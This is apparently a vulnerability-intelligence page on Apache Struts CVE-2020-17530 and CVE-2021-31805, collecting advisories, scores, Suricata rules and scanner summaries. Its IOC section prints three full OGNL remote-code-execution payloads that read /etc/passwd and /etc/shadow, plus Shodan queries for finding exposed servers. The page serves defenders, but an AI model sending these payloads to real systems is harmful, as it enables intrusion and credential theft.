CVE-2020-17530
published 2022-04-12CVE-2020-17530: The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
95.92%
99.9th percentile
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | struts | >= 2.0.0 < 2.5.30 | 2.5.30 |
| apache | struts | 2.0.0 – 2.5.29 | — |
| apache_software_foundation | apache_struts | — | — |
| oracle | business_intelligence | — | — |
| oracle | business_intelligence | — | — |
| oracle | communications_diameter_intelligence_hub | — | — |
| oracle | communications_diameter_intelligence_hub | — | — |
| oracle | communications_diameter_intelligence_hub | — | — |
| oracle | communications_diameter_intelligence_hub | — | — |
| oracle | communications_policy_management | — | — |
| oracle | communications_pricing_design_center | — | — |
| oracle | financial_services_data_integration_hub | — | — |
| oracle | financial_services_data_integration_hub | — | — |
| oracle | hospitality_opera_5 | — | — |
| oracle | mysql_enterprise_monitor | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D↗
commandid=%25{(%23instancemanager%3d%23application["org.apache.tomcat.InstanceManager"]).(%23stack%3d%23attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(%23bean%3d%23instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(%23bean.setBean(%23stack)).(%23context%3d%23bean.get("context")).(%23bean.setBean(%23context)).(%23macc%3d%23bean.get("memberAccess")).(%23bean.setBean(%23macc)).(%23emptyset%3d%23instancemanager.newInstance("java.util.HashSet")).(%23bean.put("excludedClasses",%23emptyset)).(%23bean.put("excludedPackageNames",%23emptyset)).(%23arglist%3d%23instancemanager.newInstance("java.util.ArrayList")).(%23arglist.add("id")).(%23execute%3d%23instancemanager.newInstance("freemarker.template.utility.Execute")).(%23execute.exec(%23arglist))}↗
command%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("cat /etc/shadow")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}↗
- →Inspect HTTP response body for `root:.*:0:0:` pattern (passwd file content) as a confirmation of successful RCE exploitation ↗
- →Use Shodan queries `http.html:"apache struts"`, `http.title:"struts2 showcase"`, or `http.html:"struts problem report"` to identify potentially exposed Struts2 instances for targeted scanning ↗
- →This vulnerability is application-configuration dependent — a simple Apache Struts version check is insufficient; detection requires sending an active OGNL RCE payload (POST or GET) and observing evaluated output in the response ↗
- ·The exploit bypasses Struts2's internal OGNL sandbox by nullifying `excludedClasses` and `excludedPackageNames` via BeanMap — detections relying solely on sandbox enforcement will not catch this ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_oracle9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Oracle
Oracle Oracle Communications Risk Matrix: Visualization (Apache Struts) — CVE-2020-17530
vendor_oracle·2022-04-15·CVSS 9.8
CVE-2020-17530 [CRITICAL] Oracle Oracle Communications Risk Matrix: Visualization (Apache Struts) — CVE-2020-17530
Oracle Oracle Communications Risk Matrix: Visualization (Apache Struts) vulnerability
CVE: CVE-2020-17530
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuapr2022 (APR 2022)
Red Hat
Struts: Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.
vendor_redhat·2022-04-12·CVSS 9.8
CVE-2021-31805 [CRITICAL] CWE-917 Struts: Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.
Struts: Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
Statement: Apache Struts2 is not compiled, shipped, used, or enabled in Red Hat products. As such, any CVE against Apache Struts2 does not impact currently supported Red Hat products.
This statement was last revised on 1 Sept 2020.
Previous statement example: https://bugzilla.redhat.com/show_bug.cgi?id=1469265
Package: struts (Red Ha
Oracle
Oracle Oracle Fusion Middleware Risk Matrix: Installation (Apache Struts2) — CVE-2020-17530
vendor_oracle·2022-01-15·CVSS 9.8
CVE-2020-17530 [CRITICAL] Oracle Oracle Fusion Middleware Risk Matrix: Installation (Apache Struts2) — CVE-2020-17530
Oracle Oracle Fusion Middleware Risk Matrix: Installation (Apache Struts2) vulnerability
CVE: CVE-2020-17530
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujan2022 (JAN 2022)
CISA
Apache Struts Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2020-17530 [CRITICAL] CWE-917 Apache Struts Remote Code Execution Vulnerability
Vulnerability: Apache Struts Remote Code Execution Vulnerability
Affected: Apache Struts
Forced Object-Graph Navigation Language (OGNL) evaluation in Apache Struts, when evaluated on raw user input in tag attributes, can lead to remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-17530
Remediation Due Date: 2022-05-03
Oracle
Oracle Oracle Communications Risk Matrix: Enterprise Policy (Apache Struts2) — CVE-2020-17530
vendor_oracle·2021-10-15·CVSS 9.8
CVE-2020-17530 [CRITICAL] Oracle Oracle Communications Risk Matrix: Enterprise Policy (Apache Struts2) — CVE-2020-17530
Oracle Oracle Communications Risk Matrix: Enterprise Policy (Apache Struts2) vulnerability
CVE: CVE-2020-17530
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuoct2021 (OCT 2021)
Oracle
Oracle Oracle Communications Applications Risk Matrix: CNE (Apache Struts) — CVE-2020-17530
vendor_oracle·2021-07-15·CVSS 9.8
CVE-2020-17530 [CRITICAL] Oracle Oracle Communications Applications Risk Matrix: CNE (Apache Struts) — CVE-2020-17530
Oracle Oracle Communications Applications Risk Matrix: CNE (Apache Struts) vulnerability
CVE: CVE-2020-17530
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujul2021 (JUL 2021)
Oracle
Oracle Oracle Hospitality Applications Risk Matrix: Login (Apache Struts) — CVE-2020-17530
vendor_oracle·2021-04-15·CVSS 9.8
CVE-2020-17530 [CRITICAL] Oracle Oracle Hospitality Applications Risk Matrix: Login (Apache Struts) — CVE-2020-17530
Oracle Oracle Hospitality Applications Risk Matrix: Login (Apache Struts) vulnerability
CVE: CVE-2020-17530
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuapr2021 (APR 2021)
Red Hat
struts2: using forced OGNL evaluation on untrusted user input can lead to a RCE and security degradation
vendor_redhat·2020-12-08·CVSS 9.8
CVE-2020-17530 [CRITICAL] CWE-20 struts2: using forced OGNL evaluation on untrusted user input can lead to a RCE and security degradation
struts2: using forced OGNL evaluation on untrusted user input can lead to a RCE and security degradation
Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
A flaw was found in the Apache Struts frameworks. When forced, some of the tag's attributes perform a double evaluation if a developer applies forced OGNL evaluation by using the %{...} syntax. Using a forced OGNL evaluation on untrusted user input allows an attacker to perform remote code execution and security degradation. The highest threat from this vulnerability is to data confidentiality, integrity as well as system availability.
Statement: Apache Struts2 is not compiled, shipped, used, or enabled in Red Hat prod
OSV
Expression Language Injection in Apache Struts
osv·2022-04-13·CVSS 9.8
CVE-2021-31805 [CRITICAL] Expression Language Injection in Apache Struts
Expression Language Injection in Apache Struts
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
GHSA
Expression Language Injection in Apache Struts
ghsa·2022-04-13·CVSS 9.8
CVE-2021-31805 [CRITICAL] CWE-917 Expression Language Injection in Apache Struts
Expression Language Injection in Apache Struts
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
OSV
Remote code execution in Apache Struts
osv·2022-02-09
CVE-2020-17530 [CRITICAL] Remote code execution in Apache Struts
Remote code execution in Apache Struts
Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
GHSA
Remote code execution in Apache Struts
ghsa·2022-02-09
CVE-2020-17530 [CRITICAL] CWE-917 Remote code execution in Apache Struts
Remote code execution in Apache Struts
Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
VulnCheck
Apache Struts Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-31805 [CRITICAL] Apache Struts Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
Apache Struts Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
Affected: Apache Struts
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.netlab.360.com/public-cloud-threat-intelligence-202204/; https://media.kasperskycontenthub.com/wp-
VulnCheck
Apache Struts Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-17530 [CRITICAL] CWE-917 Apache Struts Remote Code Execution Vulnerability
Apache Struts Remote Code Execution Vulnerability
Forced Object-Graph Navigation Language (OGNL) evaluation in Apache Struts, when evaluated on raw user input in tag attributes, can lead to remote code execution.
Affected: Apache Struts
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://blog.qualys.com/vulnerabilities-threat-research/2021/09/21/apache-struts-2-double-ognl-evaluation-vulnerability-cve-2020-17530; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/11/09055246/Modern-Asian-APT-groups-TTPs_report_eng.pdf
Exploit PoC: https://vulncheck.com/xdb/e3fa2afdc5f2; http
Suricata
ET EXPLOIT Apache Struts RCE Attempt (CVE-2020-17530)
suricata·2022-01-28·CVSS 9.8
CVE-2020-17530 [CRITICAL] ET EXPLOIT Apache Struts RCE Attempt (CVE-2020-17530)
ET EXPLOIT Apache Struts RCE Attempt (CVE-2020-17530)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache Struts RCE Attempt (CVE-2020-17530)"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"="; pcre:"/^(%25|%)(%7b|{)(%28|\()(%23|#)/R"; content:"instancemanager"; nocase; fast_pattern; pcre:"/^(%3d|=)(%23|#)application(%5b|\[)(%22|")org(%2e|\.)apache(%2e|\.)tomcat(%2e|\.)instancemanager(%22|")(%5d|\])(%29|\))(%2e|\.)(%28|\()(%23|#)(ognlstack|stack)(%3d|=)(%23|#)attr(%5b|\[)(%22|")com(%2e|\.)opensymphony(%2e|\.)xwork2(%2e|\.)util(%2e|\.)valuestack(%2e|\.)valuestack(%22|")(%5d|\])(%29|\))(%2e|\.)(%28|\()(%23|#)/Rsi"; content:"bean"; within:200; content:"java"; within:400; content:"execute"; distance:0; pcre:"/^(%2e|\.)exec/R
Suricata
ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Remote Code Execution Inbound (CVE-2020-17530)
suricata·2021-07-24·CVSS 9.8
CVE-2020-17530 [CRITICAL] ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Remote Code Execution Inbound (CVE-2020-17530)
ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Remote Code Execution Inbound (CVE-2020-17530)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Remote Code Execution Inbound (CVE-2020-17530)"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"|25 7b|"; content:".exec|28|"; distance:0; fast_pattern; content:"|29 7d|"; distance:0; reference:url,github.com/CyborgSecurity/CVE-2020-17530; reference:cve,2020-17530; classtype:attempted-admin; sid:2033408; rev:2; metadata:created_at 2021_07_24, cve CVE_2020_17530, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_04_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access,
Nuclei
Apache Struts2 S2-062 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2021-31805 [CRITICAL] Apache Struts2 S2-062 - Remote Code Execution
Apache Struts2 S2-062 - Remote Code Execution
Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.
Template:
id: CVE-2021-31805
info:
name: Apache Struts2 S2-062 - Remote Code Execution
author: taielab
severity: critical
description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.
impact: |
Remote code execution
remediation: Avoid using forced OGNL ev
Metasploit
Apache Struts 2 Forced Multi OGNL Evaluation
metasploit
Apache Struts 2 Forced Multi OGNL Evaluation
Apache Struts 2 Forced Multi OGNL Evaluation
The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). This vulnerability is application dependant. A server side template must make an affected use of request data to render an HTML tag attribute.
Nuclei
Apache Struts 2.0.0-2.5.25 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2020-17530 [CRITICAL] Apache Struts 2.0.0-2.5.25 - Remote Code Execution
Apache Struts 2.0.0-2.5.25 - Remote Code Execution
Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it.
Template:
id: CVE-2020-17530
info:
name: Apache Struts 2.0.0-2.5.25 - Remote Code Execution
author: pikpikcu
severity: critical
description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.
remediation: |
Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts.
referenc
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Qualys
CVE-2020-17530 Apache Struts OGNL Injection | Qualys
blogs_qualys·2021-09-21·CVSS 9.8
CVE-2020-17530 [CRITICAL] CVE-2020-17530 Apache Struts OGNL Injection | Qualys
#### Table of Contents
- About CVE-2020-17530
- Exploit Analysis
- RCE Code Analysis:
- Exploitation
- Detecting the Vulnerability with Qualys WAS
- Report
- Solution
- Credits
- Contributors
A vulnerability (CVE-2020-17530) discovered last year in the Object Graph Navigation Language (OGNL) evaluation function of Apache Struts versions 2.0.0 – 2.5.25 can be exploited by attackers to perform remote code execution. This RCE vulnerability doesn’t come packaged with Apache struts but is dependent on how the web application is configured, so a simple Apache version check cannot identify vulnerable systems.
Qualys Web Application Scanning has added a new QID to detect this vulnerability that sends a request to the target server to determine if it is exploitable. Once detected, the vulnerabil
Qualys
Apache Struts 2 Double OGNL Evaluation Vulnerability (CVE-2020-17530)
blogs_qualys·2021-09-21·CVSS 9.8
CVE-2020-17530 [CRITICAL] Apache Struts 2 Double OGNL Evaluation Vulnerability (CVE-2020-17530)
## Table of Contents
About CVE-2020-17530
Exploit Analysis
RCE Code Analysis:
Exploitation
Detecting the Vulnerability with Qualys WAS
Report
Solution
Credits
Contributors
A vulnerability (CVE-2020-17530) discovered last year in the Object Graph Navigation Language (OGNL) evaluation function of Apache Struts versions 2.0.0 – 2.5.25 can be exploited by attackers to perform remote code execution. This RCE vulnerability doesn’t come packaged with Apache struts but is dependent on how the web application is configured, so a simple Apache version check cannot identify vulnerable systems.
Qualys Web Application Scanning has added a new QID to detect this vulnerability that sends a request to the target server to determine if it is exploitable. Once detected, the vulnerability can be r
Tenable
Oracle April 2021 Critical Patch Update Addresses 257 CVEs including ‘Zerologon’ (CVE-2020-1472)
blogs_tenable·2021-04-21·CVSS 5.5
[MEDIUM] Oracle April 2021 Critical Patch Update Addresses 257 CVEs including ‘Zerologon’ (CVE-2020-1472)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
http://www.openwall.com/lists/oss-security/2022/04/12/6https://cwiki.apache.org/confluence/display/WW/S2-062https://security.netapp.com/advisory/ntap-20220420-0001/https://www.oracle.com/security-alerts/cpujul2022.htmlhttp://www.openwall.com/lists/oss-security/2022/04/12/6https://cwiki.apache.org/confluence/display/WW/S2-062https://security.netapp.com/advisory/ntap-20220420-0001/https://www.oracle.com/security-alerts/cpujul2022.html
2022-04-12
Published
2021-11-03
Added to CISA KEV
Exploited in the wild